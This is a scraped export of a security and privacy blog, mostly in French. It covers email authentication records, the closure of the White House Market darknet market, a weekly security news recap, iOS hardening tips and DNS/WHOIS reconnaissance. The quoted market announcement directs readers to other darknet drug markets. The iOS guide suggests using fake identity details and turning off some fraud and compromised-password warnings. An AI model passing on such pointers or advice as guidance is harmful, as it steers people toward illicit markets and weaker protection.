n\u0026rsquo;enverront pas de rapports aspf permet de définir une politique supplémentaire pour le SPF. Elle peut être stricte (s) ou souple (r). Dans le cas où vous avez un enregistrement SPF pour example.com, un email envoyé depuis mail@test.example.com échouera à la validation SPF si la politique est stricte, sinon il réussira si la politique est souple. adkim fait la même chose que aspf mais pour DKIM fo permet de définir le niveau de journalisation lorsque des emails échouent à la validation. 0 (par défaut) enverra des rapports si SPF et DKIM échouent tous les deux, 1 enverra des rapports si l\u0026rsquo;un des deux échoue, d enverra un email si DKIM échoue, et s si c\u0026rsquo;est le SPF. Notez qu\u0026rsquo;il est possible de combiner les règles, par exemple fo=0:d;. Outils utiles # Voici une liste d\u0026rsquo;outils que je considère utiles pour la configuration des entrées DNS de messagerie.\nmxtoolbox.com - Divers outils en ligne permettant de vérifier votre configuration de messagerie mail-tester.com - attribuera une note aux emails envoyés depuis votre serveur de messagerie, et vous dira si des choses ne fonctionnent pas ou devraient être améliorées whatsmydns.net - permet de vérifier si les entrées DNS sont correctement propagées Références # SPF Lookup Limit Explained DMARC Adoption in 2021: What\u0026rsquo;s the Problem? [More about DMARC](https://en.wikipedia.org/wiki/DMARC) More about DKIM RFC-4871 ","date":"2021-10-07","externalUrl":null,"permalink":"/fr/posts/2022/spf-dkim-and-dmarc-how-to-protect-yourself-from-people-impersonating-you-via-email/","section":"Articles","summary":"Les emails sont intrinsèquement non sécurisés et faciles à falsifier. Apprenez comment protéger vos domaines et prévenir l’usurpation grâce à SPF, DKIM et DMARC","title":"SPF, DKIM et DMARC : Comment se protéger contre l'usurpation d'identité par email","type":"posts"},{"content":"Avertissement : Cet article a été traduit de l\u0026rsquo;anglais par un LLM. La précision n\u0026rsquo;est pas garantie. Vous pouvez lire l\u0026rsquo;article original en anglais.\n« Nous avons atteint notre objectif et maintenant, conformément au plan, il est temps pour nous de prendre notre retraite. » C\u0026rsquo;est ainsi qu\u0026rsquo;a commencé le message de retraite publié le 1er octobre par Mr White, l\u0026rsquo;administrateur de White House Market. Il continue en déclarant que les nouvelles inscriptions seront désactivées avec effet immédiat.\nLe darkmarket restera cependant ouvert pour que toutes les commandes soient complétées, les litiges résolus et les utilisateurs puissent retirer leurs fonds. L\u0026rsquo;administrateur a exhorté les vendeurs à ne pas profiter de la fermeture pour agir de manière malveillante, soulignant que le système de retours d\u0026rsquo;expérience fonctionne toujours, et a été partagé avec Recon (un moteur de recherche de marchés du darknet).\nLe marché a été actif pendant un peu plus de deux ans, après avoir été créé en août 2019. À ce jour, il comptait 3 450 vendeurs actifs, 48 103 annonces et 894 479 utilisateurs (326 611 actifs). Il était souvent loué pour être le premier marché acceptant uniquement le XMR afin de préserver l\u0026rsquo;anonymat de ses utilisateurs, ainsi que pour prendre la sécurité au sérieux (par exemple en exigeant l\u0026rsquo;authentification à deux facteurs par PGP).\nWhite House Market a connu une croissance substantielle depuis son premier anniversaire, et après l\u0026rsquo;exit scam d\u0026rsquo;Empire Market (voir cet article). À cette époque, le marché ne comptait qu\u0026rsquo;environ 200 000 utilisateurs. Fait intéressant, l\u0026rsquo;annonce de la fermeture est intervenue exactement 8 ans après que Silk Road a été fermé par le FBI (1er octobre 2013).\nVoici le message officiel signé :\n-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 We have reached our goal and now, according to plan, it\u0026#39;s time to for us to retire. Effective immediately user registration and ordering have been disabled, everything else (yes, withdrawals included) is working as usual. We will keep the market online for a limited time until open orders are finalized, disputes handled and coins withdrawn. We don\u0026#39;t know how long that will take but don\u0026#39;t expect to come back 6 months from now and find the market up. All market rules are still in effect so users (both buyers and vendors) should not try to take advantage of the situation and scam, the feedback system is still working and will be shared with Recon and other markets. Because this week\u0026#39;s featured listings and stickies won\u0026#39;t generate any revenue vendors who paid for them will be refunded via their market wallet. Vendors can now advertise the markets where they operate on their vendor profiles however direct contacts are still disallowed. For alternative markets check out /d/Superlist on Dread, the ones listed there are established and going strong. Keep in mind any market can disappear at any time and for what ever reason (exit scam, law enforcement operation, hack, technical issue and so on) but markets like Monopoly (true wallet-less, direct deal) and Versus (enforced multisig) greatly minimize damage. You can also give a chance to new markets, we all have to start somewhere. Thanks everybody for your business, trust, support and of course for placing decent amounts of money in our pockets. We may come back some time in the future with a different project or we may not. Meanwhile be on the lookout for phishing or copycats, if it\u0026#39;s not signed by us it\u0026#39;s not us. Good luck and stay safe. -----BEGIN PGP SIGNATURE----- iQIzBAEBCAAdFiEEc4TySQeVvYawDu/c067gT8TGAH4FAmFW6awACgkQ067gT8TG AH54eg//ZVpgKAGtzF5JKorgQjGG1Vv157XfzyBBGSlXSRnq1Rzqzsn3gtMpqm1N ge/ocBdF2hWTocNsOubPTczeA1tIMLZHrnsC/OfeewQzFfDa0VmYQsUZZ4IVm35x kTgnKsbYHReLV3F40TnBJLBNxtxSinX8tYSeipQZydoiwbNXYrQlkBvkEw5d3AIT vBKEIw9/dD8+0mofZn/blSzxAeHfspIC92LrzxBdK8W2sHnYMIZ8s7/XvTV80GN1 4+UMKXqG6xc9tfYNlzCLIEp51HbOREAcOxzz8hEzDR0aA4BA/HlVsLRF2Kqamzc0 7IIIgNG17UyUa4NarqKxRnLCOnMxqBalotmAG/YIcitjIRc5yMEEwwLIOalbR1b0 FFmZIJKNP86nwSA1eK1nAG4ZzUqbQlmaXYmq3PHAdz2pvSjg2s5xEcfyN+pW7cfd LeJyW0T8gEpReHKXtK4itWKaYuoYrHtJb24qBLFk6pYFfp5vKiBDkg5JRN35T19S FKWDABVW6nz1M3MlFYUNJSW4I7/CuYOm5dwLiY17S0mk700rArnzf3OyAc0O7leF nst6ymaDnYsbGxKHny2+sjdw836SH0KCxTQ7dIPKa0pox4dpHicLAso8h/oLmj8E LQ2hSzjGoZeXePcNmkBWf4Bz51Orbpofdo697vBWR9lVyss8LGM= =yBQ4 -----END PGP SIGNATURE----- ","date":"2021-10-02","externalUrl":null,"permalink":"/fr/posts/2021/white-house-market-to-close-down/","section":"Articles","summary":"Avertissement : Cet article a été traduit de l’anglais par un LLM. La précision n’est pas garantie. Vous pouvez lire l’article original en anglais.\n« Nous avons atteint notre objectif et maintenant, conformément au plan, il est temps pour nous de prendre notre retraite. » C’est ainsi qu’a commencé le message de retraite publié le 1er octobre par Mr White, l’administrateur de White House Market. Il continue en déclarant que les nouvelles inscriptions seront désactivées avec effet immédiat.\n","title":"Fermeture de White House Market","type":"posts"},{"content":"After a couple of months of absence, our weekly news recap is back. Find out more about what happened this week in security, cryptocurrencies, privacy, and darkweb in about a thousand words only. In addition, if you have an iOS device, you might be interested in the article we wrote this week that suggests various ways to improve your security and privacy while using it.\nAPT # EU officially blames Russia for \u0026lsquo;Ghostwriter\u0026rsquo; hacking activities (Bleeping Computer)\n\u0026lsquo;Ghostwriter\u0026rsquo; is a disinformation campaign promoting Russian security interests that has been going on since at least March 2017, according to FireEye. On September 24th, the European Union officially blamed Russia for the operation and pledged to consider taking further steps.\nCryptocurrencies # Ethereum dev admits to helping North Korea evade crypto sanctions (Bleeping Computer)\nGriffith, a cryptocurrencies expert who was notably involved in Ethereum development was arrested and faces 20 years in prison after (among other things) travelling to North Korea to give a presentation on how to use cryptocurrencies to launder money and evade sanctions.\nChina expands crackdown by declaring all crypto activities \u0026lsquo;illegal\u0026rsquo; (Financial Times)\nAfter banning domestic financial institutions from providing crypto-currencies services earlier in May, China\u0026rsquo;s central bank took the crackdown further by declaring all activities related to digital coins illegal. Furthermore, China\u0026rsquo;s authorities stated that it was illegal for overseas exchanges to provide their services to China\u0026rsquo;s residents.\nBitcoin.org hackers steal $17,000 in \u0026lsquo;double your cash\u0026rsquo; scam (Bleeping Computer)\nHackers managed to break into bitcoin.org on September 23rd, and displayed a modal window saying: \u0026ldquo;The Bitcoin Foundation is giving back to the community! [\u0026hellip;] Send Bitcoin to this address, and we will send double the amount in return!\u0026rdquo;. As of now, the website is back to normal, but how it was breached is still unclear.\nDarknet # Trio Avoids Prison in Darkweb Drug Distribution Case (Darknet Live)\nThree British residents received suspended sentences for selling marijuana, cocaine, and amphetamine in the darkweb. They got caught after a 1kg package shipped from the Netherlands to their residence was intercepted at the airport in 2017.\nGeneral Security # Autodiscovering the Great Leak (Guardicore Labs)\nResearchers managed to exploit a design flaw in Autodiscover, a protocol used by Microsoft Exchange, to obtain 96,671 unique Windows domain credentials. The flaw could be exploited by registering domains with the same tld as the victims. If victims had emails at example.com, registering the domain Autodiscover.com would lead to receiving victims\u0026rsquo; data if an Autodiscover.xml could not be found at example.com. In addition, researchers managed to develop a downgrade attack to receive plain-text credentials through HTTP Basic Authentication (Microsoft announced it would be disabled from October 2022).\nMicrosoft adds novel feature to Exchange servers to allow it to deploy emergency temporary fixes (The Record)\nOn September 28th, Microsoft started rolling out a new security feature for Exchange email servers. Once Microsoft detects a new attack, the Microsoft Exchange Emergency Mitigation service will automatically download and apply temporary mitigations to Exchange servers while waiting for a proper patch to be available. This comes after Exchange servers were widely used by threat actors (such as China) as an attack vector for a couple of years.\nResearcher dumps three iOS zero-days after Apple failed to fix issues for months (The Record)\nA few days after Apple released iOS 15, a researcher published a list of three zero-days (along with proofs of concept) that he claims Apple failed to patch, despite being reported earlier this year. The flaws allow applications to get personal data such as AppleID emails, names, auth tokens, the list of applications installed on the device, and WiFi information.\nApple AirTag Bug Enables \u0026lsquo;Good Samaritan\u0026rsquo; Attack (Krebs on Security)\nApple\u0026rsquo;s AirTags are devices allowing to track lost items. One of their features is to let the owner record a phone number where he can be contacted and a personal message. If someone finds the AirTag, he can just scan it to see this information. A researcher found that it is possible to inject code into the phone number field, which could be exploited in ways such as redirecting people scanning a lost device to a fake Apple portal to steal their personal information.\nCloudflare Ventures into Simplifying Email Security (Dark Reading)\nCloudflare announced its intention to help to tackle the email security problem. In addition to making it easier for its customers to configure DNS security features for email (DKIM, DMARC, SPF), they released a new service (in private beta) allowing users to route emails through their servers.\nHTTPS Is Actually Everywhere (EFF)\nEFF decided to start depreciating the HTTPS Everywhere extension after having maintained it for ten years. In this period, we saw a huge increase in HTTPS usage, thanks to initiatives like Let\u0026rsquo;s Encrypt, which allowed people to generate SSL certificates easily and free of charge. Lately, all the major browsers also integrate an option to force HTTPS when visiting websites.\nResearchers discover bypass \u0026lsquo;bug\u0026rsquo; in iPhone Apple Pay, Visa to make contactless payments (ZDNet)\nResearchers from Birmingham university announced that they discovered a flaw allowing to bypass iPhone\u0026rsquo;s lock screen to make cashless transactions with Apple pay if it contains a Visa card setup in Express Transit Mode. The attack allows spending money over the contactless limit but requires having physical access to the phone.\nFCC to work on rules to prevent SIM swapping attacks (The Record)\nSIM swapping is an attack allowing hackers to get their hands on people\u0026rsquo;s phone numbers, which they then often use to steal from online banking or crypto-currencies exchange platforms. The FCC announced a formal rulemaking process due to a large amount of consumers complaints.\nAndroid Trojan GriftHorse, the gift horse you definitely should look in the mouth (Malwarebytes)\nResearchers at Zimperium discovered an Android malware campaign that they estimate has been active since at least November 2020. When victims download one of the malicious applications, they are subscribed to paying services, taking away over USD 30 a month. Over the last few months, GrigtHorse has infected more than 10 million devices in more than 70 countries.\nPrivacy # Lithuania wants users to dump Chinese phones citing data collection (Hack Read)\nLithuania\u0026rsquo;s National Cyber Security Center announced the discovery of multiple flaws in some models of Android phones manufactured by the Chinese companies Huawei, OnePlus, and Xiaomi. In addition to applications leaking personal data, the researchers discovered that some Xiaomi and Huawei phones contained content-filtering features, and received updated lists of words/phrases to censor. Full report here.\nNew Chrome feature can tell sites and webapps when you\u0026rsquo;re idle (Tech Republic)\nIn the recently deployed Google Chrome 84, the company added a new API allowing to \u0026ldquo;notify developers when a user is idle, indicating such things as lack of interaction with the keyboard, mouse, screen, activation of a screensaver, locking of the screen, or moving to a different screen.\u0026rdquo;. Surely it could do more harm than good to the users and can be disabled in the browser\u0026rsquo;s configuration screen.\nMasked Email from Fastmail and 1Password protects your identity online (Fastmail Blog)\n1Password released a new feature in collaboration with Fastmail. It allows generating unique email addresses on the fly from the password manager. The addresses can then be changed or removed if spam occurs. Generally speaking, having a unique email address for each account you create is a good thing to do for both security and privacy.\nFormer OnlyFans Employees Could Access Users\u0026rsquo; and Models\u0026rsquo; Personal Information (Vice)\nOnlyFans is a service largely used by sex workers to sell various pornographic material. According to a former employee, ex-employees of the company are able to access the support system long after leaving. Doing so may allow them to get a large number of sensitive information such as credit card information, driver\u0026rsquo;s licenses, passports, bank statements, \u0026hellip;\nInteresting Long Reads # The Business of Fraud: Laundering Funds in the Criminal Underground (Recorded Future) Value of the Choice Requirement Remedy (which.co.uk), full report here ","date":"2021-10-01","externalUrl":null,"permalink":"/blog/weekly-news-recap-8/","section":"News","summary":"After a couple of months of absence, our weekly news recap is back. Find out more about what happened this week in security, cryptocurrencies, privacy, and darkweb in about a thousand words only. In addition, if you have an iOS device, you might be interested in the article we wrote this week that suggests various ways to improve your security and privacy while using it.\n","title":"Weekly News Recap 8","type":"news"},{"content":"Avertissement : Cet article a été traduit de l\u0026rsquo;anglais par un LLM. La précision n\u0026rsquo;est pas garantie. Vous pouvez lire l\u0026rsquo;article original en anglais.\nAu cours des deux dernières décennies, les smartphones sont devenus partie intégrante de la vie quotidienne de chacun, et la plupart d\u0026rsquo;entre nous les utilisent chaque jour pour communiquer avec des personnes, lire les actualités, etc. iOS d\u0026rsquo;Apple est l\u0026rsquo;un des deux principaux systèmes d\u0026rsquo;exploitation pour appareils mobiles et est selon les rapports installé sur environ 25% de tous les smartphones.\nMalgré une récente controverse qui a mis en colère la plupart des experts en confidentialité, Apple a la réputation d\u0026rsquo;être meilleure en matière de collecte de données (Apple affirme que « La vie privée est [\u0026hellip;] l\u0026rsquo;une de nos valeurs fondamentales ») que son concurrent, Android. Cependant, une étude récente a découvert que les deux envoient des données (telles que les positions GPS, les adresses MAC des appareils à proximité, \u0026hellip;) à Apple et Google toutes les 4,5 minutes en moyenne.\nAu final, la meilleure option pour la confidentialité est soit de ne pas avoir de smartphone, soit d\u0026rsquo;utiliser quelque chose comme Lineage ou Graphene OS sans services Google, mais la plupart d\u0026rsquo;entre nous veulent/ont besoin d\u0026rsquo;un smartphone avec la majorité de ses fonctionnalités, donc certains compromis doivent être faits.\nCet article propose une liste de configurations qui peuvent être modifiées dans iOS pour rendre votre appareil un peu plus privé et sécurisé. Ces options de configuration ne sont que des suggestions, et vous pouvez simplement choisir ce qui vous convient. Au final, c\u0026rsquo;est à vous de décider où vous voulez ou non échanger de la confidentialité/sécurité contre de la commodité.\nSi vous êtes intéressé par ce qu\u0026rsquo;Apple collecte à votre sujet, vous pouvez consulter notre article précédent.\nAméliorations de sécurité # Identifiant Apple # Mot de passe et sécurité # Activez l\u0026rsquo;authentification à deux facteurs Si possible, définissez le numéro de téléphone de confiance sur un numéro qui n\u0026rsquo;est pas public (il ne semble pas possible de supprimer tous les numéros de téléphone) Obtenez un code de vérification pour vous permettre de récupérer votre compte en cas de problème, et assurez-vous de le stocker en sécurité Wi-Fi # Réglez « Demander à rejoindre les réseaux » sur « Demander », sinon l\u0026rsquo;appareil essaiera de se connecter à n\u0026rsquo;importe quel réseau sans mot de passe, ce dont une personne malveillante pourrait profiter Réglez « Rejoindre les hotspots automatiquement » sur « Jamais » Pour tous les réseaux mémorisés : supprimez les réseaux que vous n\u0026rsquo;utiliserez plus et activez l\u0026rsquo;« Adresse privée ». Pour une sécurité accrue, vous pouvez aussi désactiver l\u0026rsquo;option « Connexion automatique », car elle pourrait par exemple être utilisée par un attaquant pour obtenir votre mot de passe WiFi ou vous inciter à vous connecter à un hotspot malveillant Notifications # Réglez l\u0026rsquo;option « Afficher les aperçus » sur « Lorsque déverrouillé » ou « Jamais ». Sinon, un attaquant pourrait par exemple voler votre téléphone et obtenir des informations confidentielles depuis vos notifications (par exemple des codes 2FA par SMS) Général # Mises à jour logicielles # Activez l\u0026rsquo;option « Mises à jour automatiques » Assurez-vous de toujours faire les mises à jour dès que possible, car elles incluent généralement des correctifs pour de multiples vulnérabilités AirDrop # Réglez sur « Contacts uniquement » ou mieux, sur « Réception désactivée » Face ID et code # Si vous utilisez Face ID, activez l\u0026rsquo;option « Exiger l\u0026rsquo;attention pour Face ID » Si vous utilisez un code numérique, allez dans « Modifier le code » et définissez un « Code alphanumérique personnalisé » Désactivez toutes les options dans la liste « Autoriser l\u0026rsquo;accès en mode verrouillé » Activez l\u0026rsquo;option « Effacer les données ». Attention : si vous entrez un mauvais mot de passe dix fois, les données de l\u0026rsquo;appareil seront effacées Autres conseils généraux # Assurez-vous de mettre à jour les applications installées dès que possible Ne jailbreakez pas votre appareil Vérifiez que vous n\u0026rsquo;avez pas de profils inconnus dans Général -\u0026gt; VPN et gestion des appareils Améliorations de confidentialité # Identifiant Apple # Paiement et expédition # À moins que vous ne commandiez des articles physiques et/ou que vous ayez besoin d\u0026rsquo;une facturation correcte, vous pouvez mettre de fausses adresses et de faux noms. Attention cependant :\nCertains fournisseurs de paiement compareront les informations qu\u0026rsquo;ils ont sur vous et refuseront le lien si elles ne correspondent pas (souvent, avoir un code postal correct suffit). Mettre un faux numéro de téléphone comporte le risque que quelque chose de privé soit envoyé à une personne au hasard dans le futur. Du point de vue de la confidentialité, le mieux (si possible) serait d\u0026rsquo;éviter de lier une carte de crédit et plutôt de lier des cartes de débit prépayées ou d\u0026rsquo;acheter du crédit Apple.\niCloud # Supprimez tous les éléments synchronisés. Attention, vous perdrez des données si vous perdez votre appareil et ne faites pas de sauvegardes régulières manuellement Localiser # Désactiver les différentes options de ce menu pourrait améliorer votre confidentialité en envoyant potentiellement moins de données à Apple, mais cela comporte certains inconvénients. Du point de vue de la sécurité, cette option est intéressante car elle permet de :\nTrouver la localisation actuelle ou dernière connue de l\u0026rsquo;appareil (évidemment) Envoyer un message à l\u0026rsquo;appareil s\u0026rsquo;il est perdu Effacer l\u0026rsquo;appareil à distance Bluetooth # Désactivez-le quand vous ne l\u0026rsquo;utilisez pas VPN # Je pourrais écrire un article entier sur ce sujet. Utiliser un VPN sur votre téléphone est bien car cela permet aux différentes applications que vous utilisez de collecter moins de données à votre sujet, et certaines applications VPN ont des serveurs DNS personnalisés qui permettent de bloquer les publicités et le pistage.\nCependant, utiliser un VPN en permanence videra votre batterie, et vous devez vous assurer que vous faites confiance à votre fournisseur VPN.\nEn alternative à un VPN standard, Lockdown est une excellente option qui vous permet d\u0026rsquo;agir comme un pare-feu et de bloquer de nombreux domaines de pistage.\nNotifications # Réglez « Partage d\u0026rsquo;écran » sur « Notifications désactivées » Désactivez les « Suggestions de Siri » Concentration # Désactivez « Partager entre les appareils » Temps d\u0026rsquo;écran # Désactivez complètement ou désactivez l\u0026rsquo;option « Partager entre les appareils » Général # À propos # Ceci serait réglé par défaut sur « iPhone de [Nom] ». Renommez-le en autre chose. « iPhone de [Faux nom] » est idéal car cela ne le fait pas ressortir. AirPlay et Handoff # Réglez « AirPlay automatique sur les téléviseurs » sur « Jamais » Désactivez « Transférer vers HomePod » Désactivez « Handoff » Actualisation en arrière-plan # Si vous voulez vous assurer que les applications ne font rien quand elles ne sont pas utilisées, vous pouvez désactiver cette option pour elles Claviers # Désactivez l\u0026rsquo;option « Activer la dictée » Langue et région # Réglez votre langue et région préférées pour correspondre à l\u0026rsquo;endroit où vous vivez Siri et recherche # Désactivez « Écouter \u0026ldquo;Dis Siri\u0026rdquo; » Désactivez « Appuyer sur le bouton latéral pour Siri » Désactivez tous les « Contenu d\u0026rsquo;Apple » et « Suggestions d\u0026rsquo;Apple » Confidentialité # Services de localisation # Si vous n\u0026rsquo;avez pas besoin du GPS, vous pouvez désactiver totalement la localisation. Sinon, vous pouvez définir les permissions individuellement et activer/désactiver totalement la localisation selon vos besoins Nous avons discuté de « Partager ma position » dans une partie précédente de cet article Assurez-vous que les applications qui n\u0026rsquo;ont pas besoin d\u0026rsquo;accéder à votre GPS ont la permission réglée sur « Jamais » Si vous voulez accorder à des applications la permission de voir votre localisation, envisagez de désactiver l\u0026rsquo;option « Localisation précise ». Par exemple, une carte de prévisions météo n\u0026rsquo;a pas besoin de votre localisation exacte (la meilleure option étant d\u0026rsquo;interdire toute localisation et d\u0026rsquo;entrer manuellement le lieu pour lequel vous voulez la météo) Si vous n\u0026rsquo;êtes pas sûr de vouloir permettre à une application d\u0026rsquo;accéder à votre localisation, réglez la permission sur « Demander la prochaine fois ou quand je partage » Suivi # Désactivez « Autoriser les apps à demander le suivi » Applications et autres # Passez en revue toutes les permissions (Contacts, Calendrier, \u0026hellip;) et supprimez toutes celles qui sont inutiles (c\u0026rsquo;est-à-dire celles que vous n\u0026rsquo;utilisez pas. Par exemple, Twitter n\u0026rsquo;a pas besoin de voir vos contacts ou votre calendrier). Désactivez « Données des capteurs de recherche et d\u0026rsquo;utilisation » Désactivez « Analyse et améliorations » Désactivez « Publicités personnalisées » dans « Publicité Apple » Notez qu\u0026rsquo;Apple a introduit une option pour « Enregistrer l\u0026rsquo;activité de l\u0026rsquo;app » dans iOS 15. Vous pourriez vouloir l\u0026rsquo;activer pendant quelques jours pour voir ce que font vos applications App Store # Désactivez « Notes et avis dans l\u0026rsquo;app ». Il y a peu d\u0026rsquo;intérêt à laisser des avis aux applications, et c\u0026rsquo;est mauvais du point de vue de la confidentialité Dans « Paramètres du compte » -\u0026gt; « Recommandations personnalisées », utilisez « Effacer les données d\u0026rsquo;utilisation des apps » pour supprimer les données inutiles Dans « Paramètres du compte », désactivez « Recommandations personnalisées » Portefeuille et Apple Pay # Dans « Paramètres par défaut des transactions », supprimez l\u0026rsquo;« Email » et le « Téléphone », et mettez une fausse adresse (faites attention si vous comptez commander des appareils physiques plus tard) Mots de passe # Je recommande de ne pas utiliser le gestionnaire de mots de passe d\u0026rsquo;Apple. Je ne dis pas qu\u0026rsquo;il est sécurisé/privé ou non, mais l\u0026rsquo;utiliser vous enfermera un peu plus dans l\u0026rsquo;écosystème Apple. L\u0026rsquo;utiliser reste tout de même mieux que d\u0026rsquo;utiliser le même mot de passe partout du point de vue de la sécurité Désactivez l\u0026rsquo;option « Détecter les mots de passe compromis » dans les « Recommandations de sécurité » Mail - Protection de la confidentialité # Activez « Bloquer tout le contenu distant » Désactivez « Protéger l\u0026rsquo;activité Mail » et « Masquer l\u0026rsquo;adresse IP ». Il semble que cela utilise le VPN d\u0026rsquo;Apple pour éviter les pixels de pistage, mais si nous utilisons déjà un VPN et avons bloqué tout le contenu distant (qui inclut les pixels de pistage), alors il y a peu d\u0026rsquo;intérêt Téléphone # Si vous n\u0026rsquo;avez pas besoin que les personnes que vous appelez voient votre numéro de téléphone, vous pouvez éviter de le diffuser dans le menu « Afficher mon identifiant » Messages # À moins que vous n\u0026rsquo;utilisiez iMessage (ce que je ne recommande pas), désactivez l\u0026rsquo;option FaceTime # À moins que vous n\u0026rsquo;utilisiez FaceTime (ce que je ne recommande pas), désactivez-le Safari # Vous pourriez vouloir considérer l\u0026rsquo;utilisation de Firefox Focus comme navigateur par défaut Réglez le moteur de recherche sur DuckDuckGo Désactivez les suggestions du moteur de recherche Désactivez « Recherche rapide de site web » Désactivez les « Suggestions Safari » Désactivez l\u0026rsquo;option « Précharger le meilleur résultat » Désactivez toutes les options dans la section « Remplissage automatique » Si Firefox Focus est installé, autorisez-le comme « Bloqueur de contenu » dans les « Extensions » Réglez le répertoire « Téléchargements » sur « Sur mon iPhone » Dans « Avancé », envisagez de désactiver JavaScript (cela pourrait causer des problèmes) Si vous utilisez un VPN (ou n\u0026rsquo;en utilisez pas et ne voulez pas qu\u0026rsquo;Apple voie quoi que ce soit), réglez « Masquer l\u0026rsquo;adresse IP » sur « Désactivé » dans le menu « Confidentialité et sécurité » Dans « Confidentialité et sécurité », désactivez le menu « Vérifier Apple Pay » et « Mesure publicitaire respectant la confidentialité » Pas le meilleur du point de vue de la sécurité, mais si vous voulez plus de confidentialité vous pouvez désactiver l\u0026rsquo;« Avertissement de site web frauduleux » dans « Confidentialité et sécurité » Dans les « Réglages pour les sites web », réglez la « Caméra », le « Microphone » et la « Localisation » sur « Demander » ou « Refuser » Traduction # Activez l\u0026rsquo;option « Mode sur l\u0026rsquo;appareil » Plans # Désactivez l\u0026rsquo;option « Partager l\u0026rsquo;heure d\u0026rsquo;arrivée » Désactivez toutes les options dans « Climat » Désactivez toutes les options dans « Contribuer à Plans » Désactivez « Suivi par email » Raccourcis # Désactivez la synchronisation iCloud Désactivez le partage privé Santé # Les « Détails de santé » et la « Fiche médicale » pourraient être utiles dans le cas où vous avez une urgence médicale et êtes inconscient. Vous devriez peser les avantages et les inconvénients et décider quelle option est la bonne pour vous avant de remplir quoi que ce soit. Notez que toute personne ayant accès à votre téléphone (même verrouillé) pourra voir ces informations Photos # Désactivez « Photos iCloud » Désactivez « Mon flux de photos » Désactivez « Albums partagés » Notez que désactiver ceci signifie que vos photos ne seront plus automatiquement sauvegardées Appareil photo # Désactivez « Scanner les codes QR » Game Center # Déconnectez-vous si vous êtes connecté Conseils généraux # Assurez-vous de toujours définir correctement les permissions pour les nouvelles applications Plus vous ajoutez d\u0026rsquo;applications, plus vous êtes pisté. Envisagez de ne pas installer les applications qui ne sont pas strictement nécessaires, ou d\u0026rsquo;accéder aux services via le navigateur Crédits et lectures complémentaires # Lectures complémentaires # NIST : Apple OS/iPad OS 14 STIG Ver 1, Rel 2 Checklist Details Douglas J.Leith : Mobile Handset Privacy: Measuring The Data iOS and Android Send to Apple And Google Crédits # Photo par Bagus Hernawan sur Unsplash ","date":"2021-09-30","externalUrl":null,"permalink":"/fr/posts/2021/how-to-harden-your-ios-device-for-a-better-security-and-privacy/","section":"Articles","summary":"Avertissement : Cet article a été traduit de l’anglais par un LLM. La précision n’est pas garantie. Vous pouvez lire l’article original en anglais.\nAu cours des deux dernières décennies, les smartphones sont devenus partie intégrante de la vie quotidienne de chacun, et la plupart d’entre nous les utilisent chaque jour pour communiquer avec des personnes, lire les actualités, etc. iOS d’Apple est l’un des deux principaux systèmes d’exploitation pour appareils mobiles et est selon les rapports installé sur environ 25% de tous les smartphones.\n","title":"Comment renforcer la sécurité et la confidentialité de votre appareil iOS","type":"posts"},{"content":"Avertissement : Cet article a été traduit de l\u0026rsquo;anglais par un LLM. La précision n\u0026rsquo;est pas garantie. Vous pouvez lire l\u0026rsquo;article original en anglais.\nLes serveurs DNS sont l\u0026rsquo;un des piliers d\u0026rsquo;Internet. Entre autres choses, ils permettent à nos ordinateurs de convertir les noms de domaine en adresses IP, nous permettant de nous connecter facilement aux services sans avoir à connaître leur adresse IP.\nÀ quoi d\u0026rsquo;autre les serveurs DNS et les noms de domaine sont-ils utiles ? L\u0026rsquo;OSINT. À travers divers mécanismes, nous pouvons obtenir une variété d\u0026rsquo;informations utiles à partir d\u0026rsquo;eux. Cet article présentera certaines façons d\u0026rsquo;obtenir ces informations et ce que nous pouvons en faire. D\u0026rsquo;abord, nous verrons comment tirer parti du protocole WHOIS, puis comment utiliser la commande dig pour obtenir des informations à partir des entrées DNS. Enfin, nous discuterons des données historiques et listerons quelques services utiles pour les obtenir.\nCet article ne prétend pas être totalement exhaustif, et nous avons fait le choix de ne parler que de certaines fonctionnalités et types d\u0026rsquo;informations fondamentaux. D\u0026rsquo;autres choses liées aux noms de domaine, comme l\u0026rsquo;obtention d\u0026rsquo;informations à partir de certificats SSL, de sous-domaines ou de sitemaps, pourraient être développées dans de futurs articles.\nWHOIS et informations sur le propriétaire # La chose la plus connue pour obtenir des informations sur un nom de domaine est probablement le WHOIS, qui est un protocole permettant d\u0026rsquo;interroger des bases de données contenant les informations des propriétaires de sites web. WHOIS peut être utilisé en ligne de commande (par exemple whois domain.tld), mais il existe aussi de multiples utilitaires en ligne tels que viewdns.info (qui dispose de nombreux outils) ou who.is qui permettent de faire des requêtes via des pages web.\nLe résultat de la commande whois est généralement assez verbeux. L\u0026rsquo;exemple suivant, un extrait du whois de Facebook, montre certaines des données pertinentes retournées.\nDomain Name: FACEBOOK.COM Registry Domain ID: 2320948_DOMAIN_COM-VRSN Registrar WHOIS Server: whois.registrarsafe.com Registrar URL: https://www.registrarsafe.com Updated Date: 2020-03-10T18:53:59Z Creation Date: 1997-03-29T05:00:00Z Registrar Registration Expiration Date: 2028-03-30T04:00:00Z Registrar: RegistrarSafe, LLC Registrar IANA ID: 3237 Registrar Abuse Contact Email: abusecomplaints@registrarsafe.com Registrar Abuse Contact Phone: +1.6503087004 Domain Status: clientTransferProhibited https://www.icann.org/epp#clientTransferProhibited Registry Registrant ID: Registrant Name: Domain Admin Registrant Organization: Facebook, Inc. Registrant Street: 1601 Willow Rd Registrant City: Menlo Park Registrant State/Province: CA Registrant Postal Code: 94025 Registrant Country: US Registrant Phone: +1.6505434800 Registrant Phone Ext: Registrant Fax: +1.6505434800 Registrant Fax Ext: Registrant Email: domain@fb.com Registry Admin ID: [...] Registry Tech ID: [...] Name Server: C.NS.FACEBOOK.COM Name Server: B.NS.FACEBOOK.COM DNSSEC: unsigned URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ \u0026gt;\u0026gt;\u0026gt; Last update of WHOIS database: 2021-09-22T01:23:51Z \u0026lt;\u0026lt;\u0026lt; Si nous enquêtions sur le domaine facebook.com, nous pourrions tirer parti des informations suivantes :\nNous savons que le nom de domaine est enregistré chez registrarsafe.com. Nous pourrions utiliser les informations de contact fournies pour nous plaindre au registraire si nous avions des raisons de vouloir faire retirer des choses liées à ce domaine. Nous savons quand le domaine a été créé, quand il expirera, et quand il a été mis à jour pour la dernière fois. Il existe aussi de multiples usages pour ces informations. Par exemple, si nous essayons de déterminer si une adresse email est légitime (c\u0026rsquo;est-à-dire non utilisée pour du spam), nous pourrions argumenter qu\u0026rsquo;un email appartenant à un nom de domaine enregistré il y a dix ans est moins susceptible d\u0026rsquo;être du spam comparé à un email appartenant à un domaine enregistré il 